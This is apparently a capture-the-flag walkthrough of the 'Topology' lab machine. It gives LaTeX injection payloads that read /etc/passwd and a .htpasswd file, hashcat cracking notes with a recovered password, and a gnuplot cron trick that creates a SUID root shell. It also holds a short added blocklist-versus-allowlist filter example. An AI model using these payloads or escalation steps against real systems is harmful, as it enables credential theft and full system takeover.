Start with an nmap scan.
sudo nmap -sT --min-rate 10000 -p- 10.10.11.217
nmap --script=vuln -p22,80 10.10.11.217
echo "10.10.11.217 topology.htb" >> /etc/hosts
Nothing interesting on the page itself, so run a directory scan.
dirsearch -u http://topology.htb -e *
[22:47:43] 403 - 277B - /.htaccess_orig
[22:47:43] 403 - 277B - /.htpasswds
[22:47:43] 403 - 277B - /.htaccessOLD2
[22:47:43] 403 - 277B - /.httr-oauth
[22:47:44] 403 - 277B - /.htpasswd_test
[22:47:51] 403 - 277B - /.php
[22:51:22] 301 - 310B - /css -> http://topology.htb/css/
[22:52:40] 301 - 313B - /images -> http://topology.htb/images/
[22:52:40] 200 - 1KB - /images/
[22:52:48] 200 - 7KB - /index.html
That does not turn up anything useful either.
The subdomain http://latex.topology.htb/ is found here.
There is no directory traversal.
Reference (HackTricks): Formula/CSV/Doc/LaTeX Injection - HackTricks
Reference (GitHub): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
The LaTeX expression endpoint is injectable.
Haha, the very first PoC got banned.
Reading files:
$\lstinputlisting{/etc/passwd}$
$\lstinputlisting{/var/www/dev/.htpasswd}$
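An added example (not part of the original writeup) showing why a blocklist filter like the one this endpoint apparently used still lets `\lstinputlisting` through, and the allowlist check that closes the gap. Both command sets are constructed for illustration and are assumptions, not the site's real filter.

```python
import re

# Constructed "weak blocklist": blocks the well-known \input / \include
# file readers but forgets the listings package, so \lstinputlisting
# slips through. This is an assumption for illustration, not the real filter.
WEAK_BLOCKLIST = {"input", "include", "write18", "openin", "openout"}

# Constructed allowlist of commands a math-rendering endpoint actually needs.
SAFE_MATH_COMMANDS = {
    "frac", "sqrt", "sum", "prod", "int", "lim", "infty", "cdot", "times",
    "alpha", "beta", "gamma", "theta", "pi", "left", "right", "to",
    "sin", "cos", "tan", "log", "ln", "mathbb", "mathrm", "partial",
}

# A control sequence is a backslash followed by letters, or by one
# non-letter character (escaped symbols such as \{ \} \\ \%).
CMD_RE = re.compile(r"\\([A-Za-z]+|.)")


def blocklist_check(expr: str) -> bool:
    """Blocklist approach: accept unless a known-bad command is present."""
    return not any(cmd in WEAK_BLOCKLIST for cmd in CMD_RE.findall(expr))


def allowlist_check(expr: str) -> bool:
    """Allowlist approach: accept only if every control sequence is known-safe."""
    for cmd in CMD_RE.findall(expr):
        if len(cmd) == 1:          # single escaped symbol, no file or shell access
            continue
        if cmd not in SAFE_MATH_COMMANDS:
            return False           # unknown command: reject, do not try to enumerate evil
    return True


def classify(expr: str) -> dict:
    """Show both verdicts side by side for one submitted expression."""
    return {"blocklist": blocklist_check(expr), "allowlist": allowlist_check(expr)}
```

Run `classify(r"\lstinputlisting{/etc/passwd}")` to see the blocklist accept what the allowlist rejects.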
Use hash-identifier to work out the hash type.
Then hand it to hashcat:
hashcat -m <mode>, where the mode numbers are:
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
30 = md5(unicode($pass).$salt)
40 = md5($salt.unicode($pass))
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
130 = sha1(unicode($pass).$salt)
140 = sha1($salt.unicode($pass))
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL323
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3),MD5(Joomla)
500 = md5crypt, MD5(Unix), FreeBSD MD5,Cisco-IOS MD5
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials (DCC), MSCache
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1430 = sha256(unicode($pass).$salt)
1431 = base64(sha256(unicode($pass)))
1440 = sha256($salt.unicode($pass))
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1730 = sha512(unicode($pass).$salt)
1740 = sha512($salt.unicode($pass))
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2400 = Cisco-PIX MD5
2410 = Cisco-ASA MD5
2500 = WPA/WPA2
Recovered password: calculus20
Log in over SSH.
Grab the user flag.
Upload pspy64 here, chmod +x it and run it to see what is running (a Linux tool for watching scripts as they execute).
You can see find /opt/gnuplot -name *.plt -exec gnuplot {}
This command searches the /opt/gnuplot directory for *.plt files
and passes each one to gnuplot as an argument.
-bash-5.0$ echo "system 'cp /bin/bash /tmp/someb0dy;chmod u+s /tmp/someb0dy'">someb0dy.plt
-bash-5.0$ cp someb0dy.plt /opt/gnuplot/someb0dy.plt
-bash-5.0$ ./someb0dy -p
someb0dy-5.0# whoami
root